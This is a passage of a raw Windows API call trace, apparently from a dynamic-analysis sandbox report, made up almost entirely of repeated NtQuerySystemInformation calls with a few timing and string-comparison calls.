ResultLength=0x0) [0208.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd608, Length=0x50, ResultLength=0x0) [0208.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd4f0, Length=0x50, ResultLength=0x0) [0208.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd470, Length=0x28, ResultLength=0x0) [0208.192] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0208.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd4f0, Length=0x50, ResultLength=0x0) [0208.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd4f0, Length=0x50, ResultLength=0x0) [0208.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd4f0, Length=0x50, ResultLength=0x0) [0208.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd420, Length=0x38, ResultLength=0x0) [0208.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd250, Length=0x28, ResultLength=0x0) [0208.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd250, Length=0x28, ResultLength=0x0) [0208.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd250, Length=0x28, ResultLength=0x0) [0208.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2c0, Length=0x28, ResultLength=0x0) [0208.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd420, Length=0x38, ResultLength=0x0) [0208.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd340, Length=0x28, ResultLength=0x0) [0208.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd340, Length=0x28, ResultLength=0x0) [0208.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd420, Length=0x38, ResultLength=0x0) [0208.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2a0, Length=0x20, ResultLength=0x0) [0208.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd220, Length=0x20, ResultLength=0x0) [0208.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd220, Length=0x20, ResultLength=0x0) [0208.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd220, Length=0x20, ResultLength=0x0) [0208.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd420, Length=0x38, ResultLength=0x0) [0208.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2a0, Length=0x20, ResultLength=0x0) [0208.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd230, Length=0x20, ResultLength=0x0) [0208.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd230, Length=0x20, ResultLength=0x0) [0208.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.201] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xc751dfd550 | out: lpSystemTimeAsFileTime=0xc751dfd550*(dwLowDateTime=0xdd5eaecc, dwHighDateTime=0x1d5fb6e)) [0208.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd608, Length=0x50, ResultLength=0x0) [0208.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd540, Length=0x28, ResultLength=0x0) [0208.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd458, Length=0x50, ResultLength=0x0) [0208.201] GetTickCount () returned 0x1174bb1 [0208.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd328, Length=0x58, ResultLength=0x0) [0208.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd240, Length=0x38, ResultLength=0x0) [0208.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd070, Length=0x28, ResultLength=0x0) [0208.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd070, Length=0x28, ResultLength=0x0) [0208.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd070, Length=0x28, ResultLength=0x0) [0208.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd070, Length=0x28, ResultLength=0x0) [0208.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0e0, Length=0x28, ResultLength=0x0) [0208.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd240, Length=0x38, ResultLength=0x0) [0208.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd160, Length=0x28, ResultLength=0x0) [0208.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd160, Length=0x28, ResultLength=0x0) [0208.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd240, Length=0x38, ResultLength=0x0) [0208.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0c0, Length=0x20, ResultLength=0x0) [0208.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd040, Length=0x20, ResultLength=0x0) [0208.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd040, Length=0x20, ResultLength=0x0) [0208.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd040, Length=0x20, ResultLength=0x0) [0208.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd240, Length=0x38, ResultLength=0x0) [0208.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0c0, Length=0x20, ResultLength=0x0) [0208.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd050, Length=0x20, ResultLength=0x0) [0208.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd050, Length=0x20, ResultLength=0x0) [0208.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd328, Length=0x58, ResultLength=0x0) [0208.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd200, Length=0x38, ResultLength=0x0) [0208.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd040, Length=0x28, ResultLength=0x0) [0208.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd040, Length=0x28, ResultLength=0x0) [0208.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd040, Length=0x28, ResultLength=0x0) [0208.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd040, Length=0x28, ResultLength=0x0) [0208.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0b0, Length=0x28, ResultLength=0x0) [0208.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd200, Length=0x38, ResultLength=0x0) [0208.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd200, Length=0x38, ResultLength=0x0) [0208.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd130, Length=0x28, ResultLength=0x0) [0208.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd130, Length=0x28, ResultLength=0x0) [0208.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd200, Length=0x38, ResultLength=0x0) [0208.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd200, Length=0x38, ResultLength=0x0) [0208.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcfa0, Length=0x20, ResultLength=0x0) [0208.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf20, Length=0x20, ResultLength=0x0) [0208.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf20, Length=0x20, ResultLength=0x0) [0208.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf20, Length=0x20, ResultLength=0x0) [0208.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd170, Length=0x20, ResultLength=0x0) [0208.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd200, Length=0x38, ResultLength=0x0) [0208.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd090, Length=0x20, ResultLength=0x0) [0208.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd010, Length=0x20, ResultLength=0x0) [0208.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd010, Length=0x20, ResultLength=0x0) [0208.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd010, Length=0x20, ResultLength=0x0) [0208.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd200, Length=0x38, ResultLength=0x0) [0208.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd090, Length=0x20, ResultLength=0x0) [0208.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd010, Length=0x20, ResultLength=0x0) [0208.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd010, Length=0x20, ResultLength=0x0) [0208.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd010, Length=0x20, ResultLength=0x0) [0208.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd200, Length=0x38, ResultLength=0x0) [0208.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd090, Length=0x20, ResultLength=0x0) [0208.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd020, Length=0x20, ResultLength=0x0) [0208.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd020, Length=0x20, ResultLength=0x0) [0208.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd328, Length=0x58, ResultLength=0x0) [0208.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1f0, Length=0x58, ResultLength=0x0) [0208.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd110, Length=0x38, ResultLength=0x0) [0208.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf40, Length=0x28, ResultLength=0x0) [0208.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf40, Length=0x28, ResultLength=0x0) [0208.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf40, Length=0x28, ResultLength=0x0) [0208.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf40, Length=0x28, ResultLength=0x0) [0208.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcfb0, Length=0x28, ResultLength=0x0) [0208.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd110, Length=0x38, ResultLength=0x0) [0208.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd030, Length=0x28, ResultLength=0x0) [0208.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd030, Length=0x28, ResultLength=0x0) [0208.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) 